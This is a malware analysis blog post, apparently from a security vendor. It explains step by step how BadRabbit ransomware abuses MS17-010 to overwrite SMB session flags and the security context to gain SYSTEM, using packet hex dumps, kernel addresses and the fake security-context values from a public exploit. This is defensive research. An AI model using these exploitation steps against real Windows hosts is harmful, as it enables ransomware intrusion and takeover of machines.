BadRabbit MS17-010 Exploitation Part Two: Elevate Privileges

BadRabbit Part 2

Overview

This post continues the technical analysis of the BadRabbit ransomware attacks discussed in Part One of this two-part series. Part One described how BadRabbit uses MS17-010 to both leak a transaction data structure, and to take control of two transactions. Doing so allows BadRabbit to modify several areas of kernel memory. Part Two describes the steps taken by BadRabbit to leverage those controlled data structures to elevate the authenticated SMB session to System.

Privilege Escalation Analysis

There is no shellcode involved with this exploit. Instead, BadRabbit modifies a security context for the session to get SYSTEM access. This allows a follow-up connection to ADMIN$ that checks for the existence of cscc.dat, and if it doesn’t exist, writes infpub.dat to ADMIN$.

SMB Close Request, FID: 0x4000

SMB Close Response, FID: 0x4000

SMB Tree Disconnect Request

SMB Tree Disconnect Response

SMB Tree Connect AndX Request, Path: \\172.16.1.133\ADMIN$

SMB Tree Connect AndX Response

SMB NT Create AndX Request, Path: cscc.dat

SMB NT Create AndX Response, FID: 0x0000, Error: STATUS_OBJECT_NAME_NOT_FOUND

SMB NT Create AndX Request, FID: 0x4001, Path: infpub.dat

SMB NT Create AndX Response, FID: 0x4001

SMB Write AndX Request, FID: 0x4001, 1024 bytes at offset 0

SMB Write AndX Response, FID: 0x4001, 1024 bytes

Figure 1: SMB Traffic, Infect Target with BadRabbit

In the Wireshark output there is a “Close Request, FID: 0x4000” and a “Tree Disconnect Request.” This traffic is what happens after the session privileges have been elevated. Note the lack of an “SMB Logoff” request to close the session. Instead, a new Tree Connect request is made, BadRabbit writes itself to the target host, and then uses the SVCCTL RPC to create a service and launch BadRabbit on the target host.

The following sections cover the steps taken by BadRabbit to elevate session privileges for the SMB connection.

Modifying Session→IsNull and Session→IsAdmin Fields

Based on the next transaction, the InData pointer for MID 5851 is going to be overwritten with the address 0x864CFAEE. This address was calculated using the address of offset 0x10 of the leaked MID 5379 transaction.

SMB Header
Tree ID:  2048
Process ID:  65279
User ID:  2048
Multiplex ID:  5851
NT Trans Secondary Request (0xA1)
Parameter Count: 0
Parameter Offset: 0
Parameter Displacement: 0
Data Count: 2
Data Offset: 72
Data Displacement: 72
 0000h: 00 00 FF 53 4D 42 A1 00 03 00 00 18 01 48 53 4C  ..ÿSMB¡......HSL
 0010h: 00 00 00 10 00 00 00 00 00 00 00 00 00 08 FF FE  ..............ÿþ
 0020h: 00 08 DB 16 00 20 12 00 00 00 00 00 00 00 02 00  ..Û.. ..........
 0030h: 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00  .......0........
 0040h: 02 00 00 00 48 00 00 00 00 40 00 00 00 00 00 03  ....H....@......
 0050h: 00 00 00 01                                      ....

Figure 2: SMB Packet, Overwrite IsNull and IsAdmin

Once the InData pointer is modified, a MID 5851 request is sent to overwrite that address with 256 (0x100, last two bytes in hex dump). The original thought was that this had something to do with a buffer-size value, but that was incorrect. According to proof-of-concept code written by Worawit (see the resources section), this is overwriting two bytes of a session structure. The session address + an offset of 0x96 is used to modify the IsNull field with 0x00 and the IsAdmin field with 0x01.

Leaking the Address of the Security Context

Now that everything is in place, the address of the security context can be leaked.

Pointing MID 5851 to the Session Data Structure

MID 5379 is used to to overwrite 48 bytes located at MID 5851 + 0x44. The first three DWORDs are pointers to OutParameters, InData and OutData.

SMB Header
Tree ID:  2048
Process ID:  65279
User ID:  2048
Multiplex ID:  5379
NT Trans Secondary Request (0xA1)
Total Data Count:  48
Parameter Count:  4
Parameter Offset:  0
Parameter Displacement:  0
Data Count:  48
Data Offset:  72
Data Displacement:  68
 0000h: FF 53 4D 42 A1 00 03 00 00 18 01 48 53 4C 00 00  ÿSMB¡......HSL..
 0010h: 00 00 00 00 00 00 00 00 00 08 FF FE 00 08 03 15  ..........ÿþ....
 0020h: 12 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00  ........0.......
 0030h: 00 00 00 00 00 00 00 00 30 00 00 00 48 00 00 00  ........0...H...
 0040h: 44 00 00 00 00 31 00 00 50 60 51 86 38 62 51 86  D....1..P`Q†8bQ†
 0050h: 58 FA 4C 86 00 00 00 00 00 00 00 00 08 00 00 00  XúL†............
 0060h: 08 00 00 00 08 00 00 00 00 01 00 00 00 01 00 00  ................
 0070h: 00 01 00 00 00 00 05 00                          ........

Figure 3: SMB Packet, Modify 5851 to Leak Session Structure

These three addresses are pulled from the MID 5379 information leak:

  • 0x86516050
    • Overwrites the OutParameters pointer
    • Offset 0x18 of the MID 5379 leak
    • Used to read the _FLINK for 0x86516038
  • 0x86516238
    • Overwrites the InData pointer
  • 0x864CFA58
    • Overwrites the OutData pointer
    • Offset 0x10 of the MID 5379 leak
    • According to Worawit, this is the address of a session data structure.

Once the information leak is triggered, the data buffers pointed to by 0x86516050 and 0x864CFA58 are going to be read and sent back to the attacker. The overwritten OutParameters pointer will leak the next transaction. OutData is going to leak the session data structure.

According to the exploit code written by Worawit, the rest of the data is used to limit the amount of data being leaked and to set that transaction function (NT_RENAME).

Leak the Session Data

The attacker sends an NT Trans Rename request, followed by an NT Trans Rename secondary request using MID 5851. The target responds with 264 bytes of data from the location pointed to by the OutData pointer and the OutParameters pointer.

0000h: 28 E0 4E 86 50 00 51 86 0A 02 B0 00 00 00 00 00  (àN†P.Q†..°.....
0010h: D8 17 1A 86 01 00 00 00 00 00 00 00 1C 27 33 93  Ø..†.........'3“
0020h: 1C 27 33 93 01 00 00 00 F0 79 25 86 00 00 00 00  .'3“....ðy%†....
0030h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0040h: 01 8B DD 56 F8 4C D3 01 AC 47 64 5F F8 4C D3 01  .‹ÝVøLÓ.¬Gd_øLÓ.
0050h: FF 3F 96 D5 36 FF FF 7F FF FF FF FF FF FF FF 7F  ÿ?–Õ6ÿÿÿÿÿÿÿÿÿ
0060h: 00 00 00 00 00 00 00 00 7D 15 17 00 00 00 00 00  ........}.......
0070h: 40 94 74 CA 18 F8 40 96 0F 0D FE C1 4E AB 4B 99  @”tÊ.ø@–..þÁN«K™
0080h: 00 00 00 00 00 00 00 00 98 94 EE 8C 04 11 02 00  ........˜”îŒ....
0090h: 00 08 00 00 02 00 00 00 01 01 01 00 00 00 00 01  ................
00A0h: 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00  ................
00B0h: 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00  ................
00C0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00D0h: 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00  ................
00E0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00F0h: 1C 00 00 00 01 00 00 00 02 00 00 00 00 00 00 00  ................
0100h: 00 00 00 00 00 00 00 00                          ........

Figure 4: Leaked Session Data Structure

The first eight bytes come from the OutParameters buffer and contain the _FLINK data. The next 256 are from the OutData buffer. The address of the security context is located at offset 0x88.

Prerequisite for Overwriting the Security Context

A MID 5379 transaction modifies itself by using the InParameters pointer to overwrite its own InData pointer with an address calculated from a leaked address located at 0x00 in the OutParameters buffer in Figure 4. Subtracting 0x18 from 0x864EE028 yields the base address of the transaction. This leaked address points to the _FLINK of the transaction located at 0x864EE010.

SMB Header
Tree ID:  2048
Process ID:  65279
User ID:  2048
Multiplex ID:  5379
NT Trans Secondary Request (0xA1)
Total Parameter Count:  4
Parameter Count:  4
Parameter Offset:  72
Parameter Displacement:  72
0000h: FF 53 4D 42 A1 00 03 00 00 18 01 48 53 4C 00 00  ÿSMB¡......HSL..
0010h: 00 00 00 00 00 00 00 00 00 08 FF FE 00 08 03 15  ..........ÿþ....
0020h: 12 00 00 00 04 00 00 00 00 00 00 00 04 00 00 00  ................
0030h: 48 00 00 00 48 00 00 00 00 00 00 00 00 00 00 00  H...H...........
0040h: 00 00 00 00 00 05 00 00 10 E0 4E 86              .........àN†

Figure 5: SMB Packet, Point MID 5379 to 0x864EE010

The InData pointer of MID 5379 now points to the transaction located at 0x864EE010. The MID of the transaction located at 0x864EE010 is changed to 5851.

Figure 6: Use MID 5379 to Change MID of 0x864EE010

It’s currently unknown why MID 5379 is used to take control of another transaction by modifying the MID of 0x864EE010 to 5851. It’s likely related to how the previous one was modified to leak the session data structure. Once this has been completed, the privilege escalation phase begins.

Overwriting the Security Context

A secondary transaction request using MID 5379 is used to overwrite the InData pointer of MID 5851 with the address of the security context to be overwritten. The next MID 5851 request that contains data to be written is going to write at that address. The address of the security context is 0x8CEE9498. This was leaked from the section on using MID 5851 to leak kernel memory.

SMB Header
Tree ID:  2048
Process ID:  65279
User ID:  2048
Multiplex ID:  5379
NT Trans Secondary Request (0xA1)
Parameter Count:  0
Parameter Offset:  0
Parameter Displacement:  0
Data Count:  4
Data Offset:  72
Data Displacement:  72
0000h: 00 00 FF 53 4D 42 A1 00 03 00 00 18 01 48 53 4C  ..ÿSMB¡......HSL
0010h: 00 00 00 10 00 00 00 00 00 00 00 00 00 08 FF FE  ..............ÿþ
0020h: 00 08 03 15 00 20 12 00 00 00 00 00 00 00 04 00  ..... ..........
0030h: 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00  .......0........
0040h: 04 00 00 00 48 00 00 00 00 40 48 00 00 00 00 05  ....H....@H.....
0050h: 00 00 98 94 EE 8C                                ..˜”îŒ

Figure 7: SMB Packet, Point 5851 at Security Context

This request is followed up with a request using MID 5851 with the data that is going to be used to overwrite the security context structure.

SMB Header
Tree ID:  2048
Process ID:  65279
User ID:  2048
Multiplex ID:  5851
NT Trans Secondary Request (0xA1)
Total Data Count:  25
Parameter Count:  4
Parameter Offset:  0
Parameter Displacement:  0
Data Count:  25
Data Offset:  72
Data Displacement:  0
0000h: FF 53 4D 42 A1 00 03 00 00 18 01 48 53 4C 00 00  ÿSMB¡......HSL..
0010h: 00 00 00 00 00 00 00 00 00 08 FF FE 00 08 DB 16  ..........ÿþ..Û.
0020h: 12 00 00 00 00 00 00 00 19 00 00 00 00 00 00 00  ................
0030h: 00 00 00 00 00 00 00 00 19 00 00 00 48 00 00 00  ............H...
0040h: 00 00 00 00 00 1A 00 00 2A 02 1C 00 01 00 00 00  ........*.......
0050h: 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00  ................
0060h: 01

Figure 8: SMB Packet, Write Security Context

This is the same approach taken by the public exploit written by @_sleepya (Worawit). The following is a data structure used to store the security context data from _sleepya’s exploit:

WIN7_32_SESSION_INFO = {
‘SESSION_SECTX_OFFSET’: 0X80,
‘SESSION_ISNULL_OFFSET’: 0X96
‘FAKE_SECTX’: pack(‘<IIIIIIB’, 0x1c022a, 1, 0, 0, 2, 0, 1),
‘SECCTX_SIZE’: 0x1c,
}

Figure 9: Worawit’s Security Data Structure from the Exploit

The FAKE_SECTX contains the same data that BadRabbit is going to use to overwrite the session security context structure. Doing so, combined with the section on modifying the IsNull and IsAdmin values, completes the exploit. Now, the session has been granted full read/write privileges and BadRabbit can continue its infection.

Reference

Transaction Data Structure

Part of the following is created from the code on _sleepya’s (Worawit’s) github and the rest is from analyzing the SrvSmbTransaction function in the SMB Driver (srv.sys). This is based on Windows 7 SP1 x86.

typedef struct _SMB_COM_TRANSACTION {
0x08:  LPVOID PagePool;
0x0C:  LPVOID ConnectionStruct;
0x10:  LPVOID SessionStruct;
0x14:  LPVOID TreeConnectStruct;
0x18:  LPVOID _FLINK;
0x30:  DWORD Timeout;
0x40:  LPVOID InParameter;
0x44:  LPVOID OutParameter;
0x48:  LPVOID InData;
0x4C:  LPVOID OutData;
0x54:  DWORD MaxSetupCount;
0x58:   ParameterCount;
0x5C:               TotalParameterCount;
0x60:  DWORD MaxParameterCount;
0x68:               TotalDataCount;
0x60:  DWORD MaxDataCount;
0x72:  LPVOID TRANS_FUNCTION;
0x74:
0x78:  WORD Flags;
0x7A:  WORD TreeID;
0x7C:  WORD ProcID;
0x7E:  WORD UserID;
0x80:  WORD MultiplexID;
}  SMB_COM_TRANSACTION;

Figure 10: Transaction Data Structure

Resources

Worawait Wang’s Exploit Code

We discovered Worawit's (_sleepya on Twitter) github after doing the analysis. It was used to fill in incorrect assumptions and gaps (referenced throughout this article). This exploit code was used to model the exploit used by BadRabbit.

Check out the rest of Worawit Wang's github as it contains a significant amount of analysis on MS17-010.

Nicolas Joly’s HITCON 2017 Presentation

The following is another good resource discovered after doing the analysis:

The presentation covers multiple MS17-010 exploits that were leaked by the Shadow Brokers. The EternalSynergy slides match what is going on during BadRabbit’s exploitation of MS17-010.

CrowdStrike® Falcon Intelligence

Learn more about the CrowdStrike Falcon® Intelligence™ offerings, and read the white paper, “Threat Intelligence, Cybersecurity’s Best Kept Secret.”

 

Stop Breaches with CrowdStrike Falcon request a live demo